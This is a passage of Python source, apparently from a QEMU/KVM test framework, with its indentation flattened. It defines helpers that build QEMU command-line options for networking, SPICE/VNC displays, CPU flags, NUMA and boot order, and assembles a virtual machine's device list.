def add_net(devices, vlan, nettype, ifname=None, tftp=None,
bootfile=None, hostfwd=[], netdev_id=None,
netdev_extra_params=None, tapfds=None, script=None,
downscript=None, vhost=None, queues=None, vhostfds=None):
mode = None
if nettype in ['bridge', 'network', 'macvtap']:
mode = 'tap'
elif nettype == 'user':
mode = 'user'
else:
logging.warning("Unknown/unsupported nettype %s" % nettype)
return ''
if devices.has_option("netdev"):
cmd = " -netdev %s,id=%s" % (mode, netdev_id)
if vhost:
cmd += ",%s" % vhost
if vhostfds:
if (int(queues) > 1 and
'vhostfds=' in devices.get_help_text()):
cmd += ",vhostfds=%s" % vhostfds
else:
txt = ""
if int(queues) > 1:
txt = "qemu do not support vhost multiqueue,"
txt += " Fall back to single queue."
if 'vhostfd=' in devices.get_help_text():
cmd += ",vhostfd=%s" % vhostfds.split(":")[0]
else:
txt += " qemu do not support vhostfd."
if txt:
logging.warn(txt)
if netdev_extra_params:
cmd += "%s" % netdev_extra_params
else:
cmd = " -net %s,vlan=%d" % (mode, vlan)
if mode == "tap" and tapfds:
if (int(queues)) > 1 and ',fds=' in devices.get_help_text():
cmd += ",fds=%s" % tapfds
else:
cmd += ",fd=%s" % tapfds
elif mode == "user":
if tftp and "[,tftp=" in devices.get_help_text():
cmd += ",tftp='%s'" % tftp
if bootfile and "[,bootfile=" in devices.get_help_text():
cmd += ",bootfile='%s'" % bootfile
if "[,hostfwd=" in devices.get_help_text():
for host_port, guest_port in hostfwd:
cmd += ",hostfwd=tcp::%s-:%s" % (host_port, guest_port)
else:
if ifname:
cmd += ",ifname='%s'" % ifname
if script:
cmd += ",script='%s'" % script
cmd += ",downscript='%s'" % (downscript or "no")
return cmd
def add_floppy(devices, filename, index):
cmd_list = [" -fda '%s'", " -fdb '%s'"]
return cmd_list[index] % filename
def add_tftp(devices, filename):
# If the new syntax is supported, don't add -tftp
if "[,tftp=" in devices.get_help_text():
return ""
else:
return " -tftp '%s'" % filename
def add_bootp(devices, filename):
# If the new syntax is supported, don't add -bootp
if "[,bootfile=" in devices.get_help_text():
return ""
else:
return " -bootp '%s'" % filename
def add_tcp_redir(devices, host_port, guest_port):
# If the new syntax is supported, don't add -redir
if "[,hostfwd=" in devices.get_help_text():
return ""
else:
return " -redir tcp:%s::%s" % (host_port, guest_port)
def add_vnc(devices, vnc_port, vnc_password='no', extra_params=None):
vnc_cmd = " -vnc :%d" % (vnc_port - 5900)
if vnc_password == "yes":
vnc_cmd += ",password"
if extra_params:
vnc_cmd += ",%s" % extra_params
return vnc_cmd
def add_sdl(devices):
if devices.has_option("sdl"):
return " -sdl"
else:
return ""
def add_nographic(devices):
return " -nographic"
def add_uuid(devices, uuid):
return " -uuid '%s'" % uuid
def add_pcidevice(devices, host, params, device_driver="pci-assign"):
if device_driver == "pci-assign":
if (devices.has_device("pci-assign") or
devices.has_device("kvm-pci-assign")):
dev = QDevice(device_driver, parent_bus={'type': 'pci'})
else:
dev = qemu_devices.QCustomDevice('pcidevice',
parent_bus={'type': 'pci'})
else:
if devices.has_device(device_driver):
dev = QDevice(device_driver, parent_bus={'type': 'pci'})
else:
dev = qemu_devices.QCustomDevice('pcidevice',
parent_bus={'type': 'pci'})
help_cmd = "%s -device pci-assign,\\? 2>&1" % qemu_binary
pcidevice_help = utils.system_output(help_cmd)
dev.set_param('host', host)
dev.set_param('id', 'id_%s' % host.replace(":", "."))
fail_param = []
for param in params.get("pci-assign_params", "").split():
value = params.get(param)
if value:
if bool(re.search(param, pcidevice_help, re.M)):
dev.set_param(param, value)
else:
fail_param.append(param)
if fail_param:
msg = ("parameter %s is not support in device pci-assign."
" It only support following parameter:\n %s" %
(param, pcidevice_help))
logging.warn(msg)
devices.insert(dev)
def add_spice_rhel5(devices, spice_params, port_range=(3100, 3199)):
"""
processes spice parameters on rhel5 host.
:param spice_options - dict with spice keys/values
:param port_range - tuple with port range, default: (3000, 3199)
"""
if devices.has_option("spice"):
cmd = " -spice"
else:
return ""
spice_help = ""
if devices.has_option("spice-help"):
spice_help = commands.getoutput("%s -device \\?" % qemu_binary)
s_port = str(utils_misc.find_free_port(*port_range))
self.spice_options['spice_port'] = s_port
cmd += " port=%s" % s_port
for param in spice_params.split():
value = params.get(param)
if value:
if bool(re.search(param, spice_help, re.M)):
cmd += ",%s=%s" % (param, value)
else:
msg = ("parameter %s is not supported in spice. It "
"only supports the following parameters:\n %s"
% (param, spice_help))
logging.warn(msg)
else:
cmd += ",%s" % param
if devices.has_option("qxl"):
qxl_dev_nr = params.get("qxl_dev_nr", 1)
cmd += " -qxl %s" % qxl_dev_nr
return cmd
def add_spice(port_range=(3000, 3199),
tls_port_range=(3200, 3399)):
"""
processes spice parameters
:param port_range - tuple with port range, default: (3000, 3199)
:param tls_port_range - tuple with tls port range,
default: (3200, 3399)
"""
spice_opts = [] # will be used for ",".join()
tmp = None
def optget(opt):
"""a helper function"""
return self.spice_options.get(opt)
def set_yes_no_value(key, yes_value=None, no_value=None):
"""just a helper function"""
tmp = optget(key)
if tmp == "no" and no_value:
spice_opts.append(no_value)
elif tmp == "yes" and yes_value:
spice_opts.append(yes_value)
def set_value(opt_string, key, fallback=None):
"""just a helper function"""
tmp = optget(key)
if tmp:
spice_opts.append(opt_string % tmp)
elif fallback:
spice_opts.append(fallback)
s_port = str(utils_misc.find_free_port(*port_range))
if optget("spice_port") == "generate":
if not self.is_alive():
self.spice_options['spice_port'] = s_port
spice_opts.append("port=%s" % s_port)
self.spice_port = s_port
else:
self.spice_options['spice_port'] = self.spice_port
spice_opts.append("port=%s" % self.spice_port)
else:
set_value("port=%s", "spice_port")
set_value("password=%s", "spice_password", "disable-ticketing")
if optget("listening_addr") == "ipv4":
host_ip = utils_net.get_host_ip_address(self.params)
self.spice_options['listening_addr'] = "ipv4"
spice_opts.append("addr=%s" % host_ip)
#set_value("addr=%s", "listening_addr", )
elif optget("listening_addr") == "ipv6":
host_ip = utils_net.get_host_ip_address(self.params)
host_ip_ipv6 = utils_misc.convert_ipv4_to_ipv6(host_ip)
self.spice_options['listening_addr'] = "ipv6"
spice_opts.append("addr=%s" % host_ip_ipv6)
set_yes_no_value(
"disable_copy_paste", yes_value="disable-copy-paste")
set_value("addr=%s", "spice_addr")
if optget("spice_ssl") == "yes":
# SSL only part
t_port = str(utils_misc.find_free_port(*tls_port_range))
if optget("spice_tls_port") == "generate":
if not self.is_alive():
self.spice_options['spice_tls_port'] = t_port
spice_opts.append("tls-port=%s" % t_port)
self.spice_tls_port = t_port
else:
self.spice_options[
'spice_tls_port'] = self.spice_tls_port
spice_opts.append("tls-port=%s" % self.spice_tls_port)
else:
set_value("tls-port=%s", "spice_tls_port")
prefix = optget("spice_x509_prefix")
if ((prefix is None or not os.path.exists(prefix)) and
(optget("spice_gen_x509") == "yes")):
# Generate spice_x509_* is not always necessary,
# Regenerate them will make your existing VM
# not longer accessiable via encrypted spice.
c_subj = optget("spice_x509_cacert_subj")
s_subj = optget("spice_x509_server_subj")
# If CN is not specified, add IP of host
if s_subj[-3:] == "CN=":
s_subj += utils_net.get_host_ip_address(self.params)
passwd = optget("spice_x509_key_password")
secure = optget("spice_x509_secure")
utils_misc.create_x509_dir(prefix, c_subj, s_subj, passwd,
secure)
tmp = optget("spice_x509_dir")
if tmp == "yes":
spice_opts.append("x509-dir=%s" % (prefix))
elif tmp == "no":
cacert = optget("spice_x509_cacert_file")
server_key = optget("spice_x509_key_file")
server_cert = optget("spice_x509_cert_file")
keyfile_str = ("x509-key-file=%s,x509-cacert-file=%s,"
"x509-cert-file=%s" %
(os.path.join(prefix, server_key),
os.path.join(prefix, cacert),
os.path.join(prefix, server_cert)))
spice_opts.append(keyfile_str)
set_yes_no_value("spice_x509_secure",
yes_value="x509-key-password=%s" %
(optget("spice_x509_key_password")))
tmp = optget("spice_secure_channels")
if tmp:
for item in tmp.split(","):
spice_opts.append("tls-channel=%s" % (item.strip()))
# Less common options
set_value("seamless-migration=%s", "spice_seamless_migration")
set_value("image-compression=%s", "spice_image_compression")
set_value("jpeg-wan-compression=%s", "spice_jpeg_wan_compression")
set_value("zlib-glz-wan-compression=%s",
"spice_zlib_glz_wan_compression")
set_value("streaming-video=%s", "spice_streaming_video")
set_value("agent-mouse=%s", "spice_agent_mouse")
set_value("playback-compression=%s", "spice_playback_compression")
set_yes_no_value("spice_ipv4", yes_value="ipv4")
set_yes_no_value("spice_ipv6", yes_value="ipv6")
return " -spice %s" % (",".join(spice_opts))
def add_qxl(qxl_nr, qxl_memory=None):
"""
adds extra qxl devices + sets memory to -vga qxl and extra qxls
:param qxl_nr total number of qxl devices
:param qxl_memory sets memory to individual devices
"""
qxl_str = ""
vram_help = ""
if qxl_memory:
vram_help = "vram_size=%d" % qxl_memory
qxl_str += " -global qxl-vga.%s" % (vram_help)
for index in range(1, qxl_nr):
qxl_str += " -device qxl,id=video%d,%s"\
% (index, vram_help)
return qxl_str
def add_vga(vga):
return " -vga %s" % vga
def add_kernel(devices, filename):
return " -kernel '%s'" % filename
def add_initrd(devices, filename):
return " -initrd '%s'" % filename
def add_rtc(devices):
# Pay attention that rtc-td-hack is for early version
# if "rtc " in help:
if devices.has_option("rtc"):
cmd = " -rtc base=%s" % params.get("rtc_base", "utc")
cmd += _add_option("clock", params.get("rtc_clock", "host"))
cmd += _add_option("driftfix", params.get("rtc_drift", "none"))
return cmd
elif devices.has_option("rtc-td-hack"):
return " -rtc-td-hack"
else:
return ""
def add_kernel_cmdline(devices, cmdline):
return " -append '%s'" % cmdline
def add_testdev(devices, filename=None):
if devices.has_device("testdev"):
return (" -chardev file,id=testlog,path=%s"
" -device testdev,chardev=testlog" % filename)
elif devices.has_device("pc-testdev"):
return " -device pc-testdev"
else:
return ""
def add_isa_debug_exit(devices, iobase=0xf4, iosize=0x04):
if devices.has_device("isa-debug-exit"):
return (" -device isa-debug-exit,iobase=%s,iosize=%s" %
(iobase, iosize))
else:
return ""
def add_no_hpet(devices):
if devices.has_option("no-hpet"):
return " -no-hpet"
else:
return ""
def add_cpu_flags(devices, cpu_model, flags=None, vendor_id=None,
family=None):
if devices.has_option('cpu'):
cmd = " -cpu '%s'" % cpu_model
if vendor_id:
cmd += ",vendor=\"%s\"" % vendor_id
if flags:
if not flags.startswith(","):
cmd += ","
cmd += "%s" % flags
if family is not None:
cmd += ",family=%s" % family
return cmd
else:
return ""
def add_boot(devices, boot_order, boot_once, boot_menu):
cmd = " -boot"
pattern = "boot \[order=drives\]\[,once=drives\]\[,menu=on\|off\]"
if devices.has_option("boot \[a\|c\|d\|n\]"):
cmd += " %s" % boot_once
elif devices.has_option(pattern):
cmd += (" order=%s,once=%s,menu=%s" %
(boot_order, boot_once, boot_menu))
else:
cmd = ""
return cmd
def get_index(index):
while self.index_in_use.get(str(index)):
index += 1
return index
def add_sga(devices):
if not devices.has_option("device"):
return ""
return " -device sga"
def add_watchdog(devices, device_type=None, action="reset"):
watchdog_cmd = ""
if devices.has_option("watchdog"):
if device_type:
watchdog_cmd += " -watchdog %s" % device_type
watchdog_cmd += " -watchdog-action %s" % action
return watchdog_cmd
def add_option_rom(devices, opt_rom):
if not devices.has_option("option-rom"):
return ""
return " -option-rom %s" % opt_rom
def add_smartcard(devices, sc_chardev, sc_id):
sc_cmd = " -device usb-ccid,id=ccid0"
sc_cmd += " -chardev " + sc_chardev
sc_cmd += ",id=" + sc_id + ",name=smartcard"
sc_cmd += " -device ccid-card-passthru,chardev=" + sc_id
return sc_cmd
def add_numa_node(devices, mem=None, cpus=None, nodeid=None):
"""
This function used to add numa node to guest command line
"""
if not devices.has_option("numa"):
return ""
numa_cmd = " -numa node"
if mem is not None:
numa_cmd += ",mem=%s" % mem
if cpus is not None:
numa_cmd += ",cpus=%s" % cpus
if nodeid is not None:
numa_cmd += ",nodeid=%s" % nodeid
return numa_cmd
# End of command line option wrappers
# If nothing changed and devices exists, return imediatelly
if (name is None and params is None and root_dir is None
and self.devices is not None):
return self.devices
if name is None:
name = self.name
if params is None:
params = self.params
if root_dir is None:
root_dir = self.root_dir
have_ahci = False
have_virtio_scsi = False
virtio_scsi_pcis = []
# init value by default.
# PCI addr 0,1,2 are taken by PCI/ISA/IDE bridge and the GPU.
self.pci_addr_list = [0, 1, 2]
# Clone this VM using the new params
vm = self.clone(name, params, root_dir, copy_state=True)
# global counters
ide_bus = 0
ide_unit = 0
vdisk = 0
scsi_disk = 0
global_image_bootindex = 0
if params.get("kernel"):
global_image_bootindex = 1
qemu_binary = utils_misc.get_qemu_binary(params)
self.qemu_binary = qemu_binary
support_cpu_model = commands.getoutput("%s -cpu \\?" % qemu_binary)
index_global = 0
# init the dict index_in_use
for key in params.keys():
if 'drive_index' in key:
self.index_in_use[params.get(key)] = True
cmd = ""
# Enable the use of glibc's malloc_perturb feature
if params.get("malloc_perturb", "no") == "yes":
cmd += "MALLOC_PERTURB_=1 "
# Set the X11 display parameter if requested
if params.get("x11_display"):
cmd += "DISPLAY=%s " % params.get("x11_display")
if params.get("qemu_audio_drv"):
cmd += "QEMU_AUDIO_DRV=%s " % params.get("qemu_audio_drv")
# Add command prefix for qemu-kvm. like taskset, valgrind and so on
if params.get("qemu_command_prefix"):
qemu_command_prefix = params.get("qemu_command_prefix")
cmd += "%s " % qemu_command_prefix
# Add numa memory cmd to pin guest memory to numa node
if params.get("numa_node"):
numa_node = int(params.get("numa_node"))
if numa_node < 0:
p = utils_misc.NumaNode(numa_node)
n = int(utils_misc.get_node_count()) + numa_node
cmd += "numactl -m %s " % n
else:
n = numa_node - 1
cmd += "numactl -m %s " % n
# Start constructing devices representation
devices = qemu_devices.DevContainer(qemu_binary, self.name,
params.get('strict_mode'),
params.get(
'workaround_qemu_qmp_crash'),
params.get('allow_hotplugged_vm'))
StrDev = qemu_devices.QStringDevice
QDevice = qemu_devices.QDevice
devices.insert(StrDev('PREFIX', cmdline=cmd))
# Add the qemu binary
devices.insert(StrDev('qemu', cmdline=qemu_binary))
devices.insert(StrDev('-S', cmdline="-S"))
# Add the VM's name
devices.insert(StrDev('vmname', cmdline=add_name(devices, name)))
if params.get("qemu_sandbox", "on") == "on":
devices.insert(StrDev('sandbox', cmdline=process_sandbox(devices, "add")))
elif params.get("sandbox", "off") == "off":
devices.insert(StrDev('qemu_sandbox', cmdline=process_sandbox(devices, "rem")))
devs = devices.machine_by_params(params)
for dev in devs:
devices.insert(dev)
# no automagic devices please
defaults = params.get("defaults", "no")
if devices.has_option("nodefaults") and defaults != "yes":
devices.insert(StrDev('nodefaults', cmdline=" -nodefaults"))
vga = params.get("vga")
if vga:
if vga != 'none':
devices.insert(StrDev('VGA-%s' % vga, {'addr': 2},
cmdline=add_vga(vga),
parent_bus={'type': 'pci'}))
else:
devices.insert(StrDev('VGA-none', cmdline=add_vga(vga)))
if vga == "qxl":
qxl_dev_memory = int(params.get("qxl_dev_memory", 0))
qxl_dev_nr = int(params.get("qxl_dev_nr", 1))
devices.insert(StrDev('qxl',
cmdline=add_qxl(qxl_dev_nr, qxl_dev_memory)))
elif params.get('defaults', 'no') != 'no': # by default add cirrus
devices.insert(StrDev('VGA-cirrus', {'addr': 2},
cmdline=add_vga(vga),
parent_bus={'type': 'pci'}))
# When old scsi fmt is used, new device with lowest pci_addr is created
devices.hook_fill_scsi_hbas(params)
# -soundhw addresses are always the lowest after scsi
soundhw = params.get("soundcards")
if soundhw:
if not devices.has_option('device') or soundhw == "all":
for sndcard in ('AC97', 'ES1370', 'intel-hda'):
# Add all dummy PCI devices and the actuall command below
devices.insert(StrDev("SND-%s" % sndcard,
parent_bus={'type': 'pci'}))
devices.insert(StrDev('SoundHW',
cmdline="-soundhw %s" % soundhw))
else:
# TODO: Use QDevices for this and set the addresses properly
for sound_device in soundhw.split(","):
if "hda" in sound_device:
devices.insert(QDevice('intel-hda',
parent_bus={'type': 'pci'}))
devices.insert(QDevice('hda-duplex'))
elif sound_device in ["es1370", "ac97"]:
devices.insert(QDevice(sound_device.upper(),
parent_bus={'type': 'pci'}))
else:
devices.insert(QDevice(sound_device,
parent_bus={'type': 'pci'}))
# Add monitors
for monitor_name in params.objects("monitors"):
monitor_params = params.object_params(monitor_name)
monitor_filename = qemu_monitor.get_monitor_filename(vm,
monitor_name)
if monitor_params.get("monitor_type") == "qmp":
cmd = add_qmp_monitor(devices, monitor_name,
monitor_filename)
devices.insert(StrDev('QMP-%s' % monitor_name, cmdline=cmd))
else:
cmd = add_human_monitor(devices, monitor_name,
monitor_filename)
devices.insert(StrDev('HMP-%s' % monitor_name, cmdline=cmd))
# Add serial console redirection
for serial in params.objects("isa_serials"):
serial_filename = vm.get_serial_console_filename(serial)
cmd = add_serial(devices, serial, serial_filename)
devices.insert(StrDev('SER-%s' % serial, cmdline=cmd))
# Add virtio_serial ports
no_virtio_serial_pcis = 0
no_virtio_ports = 0
virtio_port_spread = int(params.get('virtio_port_spread', 2))
for port_name in params.objects("virtio_ports"):
port_params = params.object_params(port_name)
bus = params.get('virtio_port_bus', False)
if bus is not False: # Manually set bus
bus = int(bus)
elif not virtio_port_spread:
# bus not specified, let qemu decide
pass
elif not no_virtio_ports % virtio_port_spread:
# Add new vio-pci every n-th port. (Spread ports)
bus = no_virtio_serial_pcis
else: # Port not overriden, use last vio-pci
bus = no_virtio_serial_pcis - 1
if bus < 0: # First bus
bus = 0
# Add virtio_serial_pcis
for i in range(no_virtio_serial_pcis, bus + 1):
dev = QDevice('virtio-serial-pci', parent_bus={'type': 'pci'})
dev.set_param('id', 'virtio_serial_pci%d' % i)
devices.insert(dev)
no_virtio_serial_pcis += 1
if bus is not False:
bus = "virtio_serial_pci%d.0" % bus
# Add actual ports
cmd = add_virtio_port(devices, port_name, bus,
self.get_virtio_port_filename(port_name),
port_params.get('virtio_port_type'),
port_params.get('virtio_port_chardev'),
port_params.get('virtio_port_name_prefix'),
no_virtio_ports,
port_params.get('virtio_port_params', ''))
devices.insert(StrDev('VIO-%s' % port_name, cmdline=cmd))
no_virtio_ports += 1
# Add logging
devices.insert(StrDev('isa-log', cmdline=add_log_seabios(devices)))
if params.get("anaconda_log", "no") == "yes":
add_log_anaconda(devices)
# Add USB controllers
usbs = params.objects("usbs")
if not devices.has_option("device"):
usbs = ("oldusb",) # Old qemu, add only one controller '-usb'
for usb_name in usbs:
usb_params = params.object_params(usb_name)
for dev in devices.usbc_by_params(usb_name, usb_params):
devices.insert(dev)
# Add images (harddrives)
for image_name in params.objects("images"):
# FIXME: Use qemu_devices for handling indexes
image_params = params.object_params(image_name)
if image_params.get("boot_drive") == "no":
continue
if params.get("index_enable") == "yes":
drive_index = image_params.get("drive_index")
if drive_index:
index = drive_index
else:
index_global = get_index(index_global)
index = str(index_global)
index_global += 1
else:
index = None
image_bootindex = None
image_boot = image_params.get("image_boot")
if not re.search("boot=on\|off", devices.get_help_text(),
re.MULTILINE):
if image_boot in ['yes', 'on', True]:
image_bootindex = str(global_image_bootindex)
global_image_bootindex += 1
image_boot = "unused"
image_bootindex = image_params.get('bootindex',
image_bootindex)
else:
if image_boot in ['yes', 'on', True]:
if global_image_bootindex > 0:
image_boot = False
global_image_bootindex += 1
image_params = params.object_params(image_name)
if image_params.get("boot_drive") == "no":
continue
devs = devices.images_define_by_params(image_name, image_params,
'disk', index, image_boot,
image_bootindex)
for _ in devs:
devices.insert(_)
# Networking
redirs = []
for redir_name in params.objects("redirs"):
redir_params = params.object_params(redir_name)
guest_port = int(redir_params.get("guest_port"))
host_port = vm.redirs.get(guest_port)
redirs += [(host_port, guest_port)]
iov = 0
for nic in vm.virtnet:
nic_params = params.object_params(nic.nic_name)
if nic_params.get('pci_assignable') == "no":
script = nic_params.get("nic_script")
downscript = nic_params.get("nic_downscript")
vhost = nic_params.get("vhost")
script_dir = data_dir.get_data_dir()
if script:
script = utils_misc.get_path(script_dir, script)
if downscript:
downscript = utils_misc.get_path(script_dir, downscript)
# setup nic parameters as needed
# add_netdev if netdev_id not set
nic = vm.add_nic(**dict(nic))
# gather set values or None if unset
vlan = int(nic.get('vlan'))
netdev_id = nic.get('netdev_id')
device_id = nic.get('device_id')
mac = nic.get('mac')
nic_model = nic.get("nic_model")
nic_extra = nic.get("nic_extra_params")
bootindex = nic_params.get("bootindex")
netdev_extra = nic.get("netdev_extra_params")
bootp = nic.get("bootp")
if nic.get("tftp"):
tftp = utils_misc.get_path(root_dir, nic.get("tftp"))
else:
tftp = None
nettype = nic.get("nettype", "bridge")
# don't force conversion add_nic()/add_net() optional parameter
if nic.has_key('tapfds'):
tapfds = nic.tapfds
else:
tapfds = None
if nic.has_key('vhostfds'):
vhostfds = nic.vhostfds
else:
vhostfds = None
ifname = nic.get('ifname')
queues = nic.get("queues", 1)
# specify the number of MSI-X vectors that the card should have;
# this option currently only affects virtio cards
if nic_params.get("enable_msix_vectors") == "yes":
if nic.has_key("vectors"):
vectors = nic.vectors
else:
vectors = 2 * int(queues) + 1
else:
vectors = None
# Handle the '-net nic' part
add_nic(devices, vlan, nic_model, mac,
device_id, netdev_id, nic_extra,
nic_params.get("nic_pci_addr"),
bootindex, queues, vectors)
# Handle the '-net tap' or '-net user' or '-netdev' part
cmd = add_net(devices, vlan, nettype, ifname, tftp,
bootp, redirs, netdev_id, netdev_extra,
tapfds, script, downscript, vhost, queues,
vhostfds)
# TODO: Is every NIC a PCI device?
devices.insert(StrDev("NET-%s" % nettype, cmdline=cmd))
else:
device_driver = nic_params.get("device_driver", "pci-assign")
pci_id = vm.pa_pci_ids[iov]
add_pcidevice(devices, pci_id, params=nic_params,
device_driver=device_driver)
iov += 1
mem = params.get("mem")
if mem:
devices.insert(StrDev('mem', cmdline=add_mem(devices, mem)))
smp = int(params.get("smp", 0))
vcpu_maxcpus = int(params.get("vcpu_maxcpus", 0))
vcpu_sockets = int(params.get("vcpu_sockets", 0))
vcpu_cores = int(params.get("vcpu_cores", 0))
vcpu_threads = int(params.get("vcpu_threads", 0))
# Force CPU threads to 2 when smp > 8.
if smp > 8 and vcpu_threads <= 1:
vcpu_threads = 2
# Some versions of windows don't support more than 2 sockets of cpu,
# here is a workaround to make all windows use only 2 sockets.
if (vcpu_sockets and vcpu_sockets > 2
and params.get("os_type") == 'windows'):
vcpu_sockets = 2
if smp == 0 or vcpu_sockets == 0:
vcpu_cores = vcpu_cores or 1
vcpu_threads = vcpu_threads or 1
if smp and vcpu_sockets == 0:
vcpu_sockets = int(smp / (vcpu_cores * vcpu_threads)) or 1
else:
vcpu_sockets = vcpu_sockets or 1
if smp == 0:
smp = vcpu_cores * vcpu_threads * vcpu_sockets
else:
if vcpu_cores == 0:
vcpu_threads = vcpu_threads or 1
vcpu_cores = int(smp / (vcpu_sockets * vcpu_threads)) or 1
else:
vcpu_threads = int(smp / (vcpu_cores * vcpu_sockets)) or 1
self.cpuinfo.smp = smp
self.cpuinfo.maxcpus = vcpu_maxcpus or smp
self.cpuinfo.cores = vcpu_cores
self.cpuinfo.threads = vcpu_threads
self.cpuinfo.sockets = vcpu_sockets
devices.insert(StrDev('smp', cmdline=add_smp(devices)))
numa_total_cpus = 0
numa_total_mem = 0
for numa_node in params.objects("guest_numa_nodes"):
numa_params = params.object_params(numa_node)
numa_mem = numa_params.get("numa_mem")
numa_cpus = numa_params.get("numa_cpus")
numa_nodeid = numa_params.get("numa_nodeid")
if numa_mem is not None:
numa_total_mem += int(numa_mem)
if numa_cpus is not None:
numa_total_cpus += len(utils_misc.cpu_str_to_list(numa_cpus))
devices.insert(StrDev('numa', cmdline=add_numa_node(devices)))
if params.get("numa_consistency_check_cpu_mem", "no") == "yes":
if (numa_total_cpus > int(smp) or numa_total_mem > int(mem)
or len(params.objects("guest_numa_nodes")) > int(smp)):
logging.debug("-numa need %s vcpu and %s memory. It is not "
"matched the -smp and -mem. The vcpu number "
"from -smp is %s, and memory size from -mem is"
" %s" % (numa_total_cpus, numa_total_mem, smp,
mem))
raise virt_vm.VMDeviceError("The numa node cfg can not fit"
" smp and memory cfg.")
cpu_model = params.get("cpu_model")
use_default_cpu_model = True
if cpu_model:
use_default_cpu_model = False
for model in re.split(",", cpu_model):
model = model.strip()
if not model in support_cpu_model:
continue
cpu_model = model
break
else:
cpu_model = model
logging.error("Non existing CPU model %s will be passed "
"to qemu (wrong config or negative test)", model)
if use_default_cpu_model:
cpu_model = params.get("default_cpu_model")
if cpu_model:
vendor = params.get("cpu_model_vendor")
flags = params.get("cpu_model_flags")
family = params.get("cpu_family")
self.cpuinfo.model = cpu_model
self.cpuinfo.vendor = vendor
self.cpuinfo.flags = flags
self.cpuinfo.family = family
cmd = add_cpu_flags(devices, cpu_model, flags, vendor, family)
devices.insert(StrDev('cpu', cmdline=cmd))
# Add cdroms
for cdrom in params.objects("cdroms"):
image_params = params.object_params(cdrom)
# FIXME: Use qemu_devices for handling indexes
if image_params.get("boot_drive") == "no":
continue
if params.get("index_enable") == "yes":
drive_index = image_params.get("drive_index")
if drive_index:
index = drive_index
else:
index_global = get_index(index_global)
index = str(index_global)
index_global += 1
else:
index = None
image_bootindex = None
image_boot = image_params.get("image_boot")
if not re.search("boot=on\|off", devices.get_help_text(),
re.MULTILINE):
if image_boot in ['yes', 'on', True]:
image_bootindex = str(global_image_bootindex)
global_image_bootindex += 1
image_boot = "unused"
image_bootindex = image_params.get(
'bootindex', image_bootindex)
else:
if image_boot in ['yes', 'on', True]:
if global_image_bootindex > 0:
image_boot = False
global_image_bootindex += 1
iso = image_params.get("cdrom")
if iso or image_params.get("cdrom_without_file") == "yes":
devs = devices.cdroms_define_by_params(cdrom, image_params,
'cdrom', index,
image_boot,
image_bootindex)
for _ in devs:
devices.insert(_)
# We may want to add {floppy_otps} parameter for -fda, -fdb
# {fat:floppy:}/path/. However vvfat is not usually recommended.
for floppy_name in params.objects('floppies'):
image_params = params.object_params(floppy_name)
# TODO: Unify image, cdrom, floppy params
image_params['drive_format'] = 'floppy'
image_params[
'image_readonly'] = image_params.get("floppy_readonly",
"no")
# Use the absolute patch with floppies (pure *.vfd)
image_params['image_raw_device'] = 'yes'
image_params['image_name'] = utils_misc.get_path(
data_dir.get_data_dir(),
image_params["floppy_name"])
image_params['image_format'] = None
devs = devices.images_define_by_params(floppy_name, image_params,
media='')
for _ in devs:
devices.insert(_)
# Add usb devices
for usb_dev in params.objects("usb_devices"):
usb_dev_params = params.object_params(usb_dev)
devices.insert(devices.usb_by_params(usb_dev, usb_dev_params))
tftp = params.get("tftp")
if tftp:
tftp = utils_misc.get_path(data_dir.get_data_dir(), tftp)
devices.insert(StrDev('tftp', cmdline=add_tftp(devices, tftp)))
bootp = params.get("bootp")
if bootp:
devices.insert(StrDev('bootp',
cmdline=add_bootp(devices, bootp)))
kernel = params.get("kernel")
if kernel:
kernel = utils_misc.get_path(data_dir.get_data_dir(), kernel)
devices.insert(StrDev('kernel',
cmdline=add_kernel(devices, kernel)))
kernel_params = params.get("kernel_params")
if kernel_params:
cmd = add_kernel_cmdline(devices, kernel_params)
devices.insert(StrDev('kernel-params', cmdline=cmd))
initrd = params.get("initrd")
if initrd:
initrd = utils_misc.get_path(data_dir.get_data_dir(), initrd)
devices.insert(StrDev('initrd',
cmdline=add_initrd(devices, initrd)))
for host_port, guest_port in redirs:
cmd = add_tcp_redir(devices, host_port, guest_port)
devices.insert(StrDev('tcp-redir', cmdline=cmd))
cmd = ""
if params.get("display") == "vnc":
vnc_extra_params = params.get("vnc_extra_params")
vnc_password = params.get("vnc_password", "no")
cmd += add_vnc(devices, self.vnc_port, vnc_password,
vnc_extra_params)
elif params.get("display") == "sdl":
cmd += add_sdl(devices)
elif params.get("display") == "nographic":
cmd += add_nographic(devices)
elif params.get("display") == "spice":
if params.get("rhel5_spice"):
spice_params = params.get("spice_params")
cmd += add_spice_rhel5(devices, spice_params)
else:
spice_keys = (
"spice_port", "spice_password", "spice_addr", "spice_ssl",
"spice_tls_port", "spice_tls_ciphers", "spice_gen_x509",
"spice_x509_dir", "spice_x509_prefix",
"spice_x509_key_file", "spice_x509_cacert_file",
"spice_x509_key_password", "spice_x509_secure",
"spice_x509_cacert_subj", "spice_x509_server_subj",
"spice_secure_channels", "spice_image_compression",
"spice_jpeg_wan_compression",
"spice_zlib_glz_wan_compression", "spice_streaming_video",
"spice_agent_mouse", "spice_playback_compression",
"spice_ipv4", "spice_ipv6", "spice_x509_cert_file",
"disable_copy_paste", "spice_seamless_migration",
"listening_addr"
)
for skey in spice_keys:
value = params.get(skey, None)
if value:
self.spice_options[skey] = value
cmd += add_spice()
if cmd:
devices.insert(StrDev('display', cmdline=cmd))
if params.get("uuid") == "random":
cmd = add_uuid(devices, vm.uuid)
devices.insert(StrDev('uuid', cmdline=cmd))
elif params.get("uuid"):
cmd = add_uuid(devices, params.get("uuid"))
devices.insert(StrDev('uuid', cmdline=cmd))
if params.get("testdev") == "yes":
cmd = add_testdev(devices, vm.get_testlog_filename())
devices.insert(StrDev('testdev', cmdline=cmd))
if params.get("isa_debugexit") == "yes":
iobase = params.get("isa_debugexit_iobase")
iosize = params.get("isa_debugexit_iosize")
cmd = add_isa_debug_exit(devices, iobase, iosize)
devices.insert(StrDev('isa_debugexit', cmdline=cmd))
if params.get("disable_hpet") == "yes":
devices.insert(StrDev('nohpet', cmdline=add_no_hpet(devices)))
devices.insert(StrDev('rtc', cmdline=add_rtc(devices)))
if devices.has_option("boot"):
boot_order = params.get("boot_order", "cdn")
boot_once = params.get("boot_once", "c")
boot_menu = params.get("boot_menu", "off")
cmd = add_boot(devices, boot_order, boot_once, boot_menu)
devices.insert(StrDev('bootmenu', cmdline=cmd))
p9_export_dir = params.get("9p_export_dir")
if p9_export_dir:
cmd = " -fsdev"
p9_fs_driver = params.get("9p_fs_driver")
if p9_fs_driver == "handle":
cmd += " handle,id=local1,path=" + p9_export_dir
